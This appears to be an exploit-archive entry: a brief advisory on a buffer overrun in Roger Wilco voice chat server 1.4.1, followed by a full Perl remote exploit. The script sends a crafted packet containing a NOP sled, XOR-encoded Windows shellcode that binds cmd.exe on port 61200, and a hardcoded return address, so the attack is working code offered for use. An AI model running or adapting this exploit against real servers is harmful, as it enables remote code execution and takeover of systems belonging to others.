Roger Wilco 1.4.1 - Remote Server Side Buffer Overrun Vulnerability

                                                source: http://www.securityfocus.com/bid/8566/info

A vulnerability has been reported for various Roger Wilco server releases. The problem occurs server-side, and can be triggered when processing malformed client packets. Specifically, when connecting to a server the Roger Wilco client transmits a packet containing the size of data to be copied into an internal buffer. As a result, a malicious user could modify the size to result in excessive data being copied into a previously allocated buffer. This could ultimately allow for sensitive server memory to be corrupted, potentially resulting in the execution of arbitrary code.

#!/usr/bin/perl
#
#       RogerWilco v1.4.1.6 remote buffer overflow exploit
#  ...just for fun
#
# Binds cmd.exe shell on port 61200.
# Retaddr 0x0122fa44 will works only if roger.exe has md5
# checksum 89f2d9cda1abc1f55cd06181fbdd6e43 (v.1.4.1.6).
# And there is no metter what win32 operation system installed
# (winnxp/2k/nt/me/9x/03).
# Btw, RogerWilco is a kewl Internet Voice chat for gamers (hm).
# Vendor: rogerwilco.gamespy.com.
# Bug founded by Auriemma Luigi (hey dude in da third time ;])
# Advisory: security.nnov.ru/search/document.asp?docid=5074
#
# Greets to all ppl from #m00sec #nerf and #priv8security (EFnet)
#
# d4rkgr3y [[email protected]] // m00 [www.m00.ru]
#

use IO::Socket;
$host = "127.0.0.1";
$port = "3782";
$retaddr = "\x44\xfa\x22\x01";

$shellcode =
	"\x33\xff". #xor edi,edi
	"\x33\xf6". #xor esi,esi
	"\x33\xdb". #xor ebx,ebx
	"\xB8\x01\xF0\x22\x01". #mov eax,122F020
	#"\xcc". #int3
	"\x83\xC0\x15\x33\xC9\x66\xB9\xD1\x01\x80\x30\x96\x40\xE2\xFA". #decryptor
	#winxp/2k xored portbind shellcode
	"\x15\x7A\xA2\x1D\x62\x7E\xD1\x97\x96\x96\x1F\x90\x69\xA0\xFE\x18\xD8\x98\x7A\x7E\xF7".
	"\x97\x96\x96\x1F\xD0\x9E\x69\xA0\xFE\x3B\x4F\x93\x58\x7E\xC4\x97\x96\x96\x1F\xD0".
	"\x9A\xFE\xFA\xFA\x96\x96\xFE\xA5\xA4\xB8\xF2\xFE\xE1\xE5\xA4\xC9\xC2\x69\xC0\x9E".
	"\x1F\xD0\x92\x69\xA0\xFE\xE4\x68\x25\x80\x7E\xBB\x97\x96\x96\x1F\xD0\x86\x69\xA0".
	"\xFE\xE8\x4E\x74\xE5\x7E\x88\x97\x96\x96\x1F\xD0\x82\x69\xE0\x92\xFE\x5D\x7B\x6A".
	"\xAD\x7E\x98\x97\x96\x96\x1F\xD0\x8E\x69\xE0\x92\xFE\x4F\x9F\x63\x3B\x7E\x68\x96".
	"\x96\x96\x1F\xD0\x8A\x69\xE0\x92\xFE\x32\x8C\xE6\x51\x7E\x78\x96\x96\x96\x1F\xD0".
	"\xB6\x69\xE0\x92\xFE\x32\x3B\xB8\x7F\x7E\x48\x96\x96\x96\x1F\xD0\xB2\x69\xE0\x92".
	"\xFE\x73\xDF\x10\xDF\x7E\x58\x96\x96\x96\x1F\xD0\xBE\x69\xE0\x92\xFE\x71\xEF\x50".
	"\xEF\x7E\x28\x96\x96\x96\x1F\xD0\xBA\xA5\x69\x17\x7A\x06\x97\x96\x96\xC2\xFE\x97".
	"\x97\x96\x96\x69\xC0\x8E\xC6\xC6\xC6\xC6\xD6\xC6\xD6\xC6\x69\xC0\x8A\x1D\x4E\xC1".
	"\xC1\xFE\x94\x96\x79\x86\x1D\x5A\xFC\x80\xC7\xC5\x69\xC0\xB6\xC1\xC5\x69\xC0\xB2".
	"\xC1\xC7\xC5\x69\xC0\xBE\x1D\x46\xFE\xF3\xEE\xF3\x96\xFE\xF5\xFB\xF2\xB8\x1F\xF0".
	"\xA6\x15\x7A\xC2\x1B\xAA\xB2\xA5\x56\xA5\x5F\x15\x57\x83\x3D\x74\x6B\x50\xD2\xB2".
	"\x86\xD2\x68\xD2\xB2\xAB\x1F\xC2\xB2\xDE\x1F\xC2\xB2\xDA\x1F\xC2\xB2\xC6\x1B\xD2".
	"\xB2\x86\xC2\xC6\xC7\xC7\xC7\xFC\x97\xC7\xC7\x69\xE0\xA6\xC7\x69\xC0\x86\x1D\x5A".
	"\xFC\x69\x69\xA7\x69\xC0\x9A\x1D\x5E\xC1\x69\xC0\xBA\x69\xC0\x82\xC3\xC0\xF2\x37".
	"\xA6\x96\x96\x96\x13\x56\xEE\x9A\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\x7D\x9F".
	"\x1D\xD6\xA2\x1D\x3E\x2E\x96\x96\x96\x1D\x53\xC8\xCB\x54\x92\x96\xC5\xC3\xC0\xC1".
	"\x1D\xFA\xB2\x8E\x1D\xD3\xAA\x1D\xC2\x93\xEE\x95\x43\x1D\xDC\x8E\x1D\xCC\xB6\x95".
	"\x4B\x75\xA4\xDF\x1D\xA2\x1D\x95\x63\xA5\x69\x6A\xA5\x56\x3A\xAC\x52\xE2\x91\x57".
	"\x59\x9B\x95\x6E\x7D\x64\xAD\xEA\xB2\x82\xE3\x77\x1D\xCC\xB2\x95\x4B\xF0\x1D\x9A".
	"\xDD\x1D\xCC\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x7D\x94\xA5\x56\x1D\x43\xC9\xC8\xCB".
	"\xCD\x54\x92\x96";


for($i=0;$i<1263-200-490;$i++) {
	$execode .= "\x90";
}

$execode .= "$shellcode";

for($i=0;$i<200;$i++) {
	$execode .= "\x90";
}
print "\n\rRogerWilco v1.4.1.6 remote buffer overflow exploit\n\n=> Connecting to $host:$port.. ";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die " damn\n";
print "ok\n=> Sending exploit buffer... ";
$buf =
	"\x0F\x00\x05\x08\x6A\xD6\x4C\x03".
	"\x96\xED\x3B\xE7\x88\xE2\xA9\x74".
	"channel".
	"\x00".
	"$execode".
	"$retaddr".
	"\x0F\x10\x00\x04".
	"d4rk".
	"\x0F\x11\x00\x04\x00\x00\x00\x02".
	"\x0F\x12\x00\x04\x00\x00\x00\x00";

print $socket "$buf";
print "ok\n=> Exiting... \n\n";
sleep(2);

close($socket);